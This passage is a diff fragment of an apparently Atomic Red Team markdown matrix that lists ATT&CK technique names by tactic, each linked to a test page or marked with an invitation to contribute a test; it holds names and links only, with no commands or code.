+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [External Remote Services](../../T1133/T1133.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Archive Collected Data](../../T1560/T1560.md) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Software Deployment Tools](../../T1072/T1072.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
+|  | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+|  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
+|  | [Inter-Process Communication](../../T1559/T1559.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) |  | [Video Capture](../../T1125/T1125.md) |  | [Non-Standard Port](../../T1571/T1571.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Encrypted Channel](../../T1573/T1573.md) | [Data Destruction](../../T1485/T1485.md) |
+|  | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Escape to Host](../../T1611/T1611.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Cloud Storage Object Discovery](../../T1619/T1619.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [Log Enumeration](../../T1654/T1654.md) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
+|  | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) |  | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+|  | Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
+|  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
+|  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Query Registry](../../T1012/T1012.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
+|  |  | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Application Access Token](../../T1528/T1528.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Cloud Service Discovery](../../T1526/T1526.md) |  | Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
+|  |  | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  |  |  |
+|  |  | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |
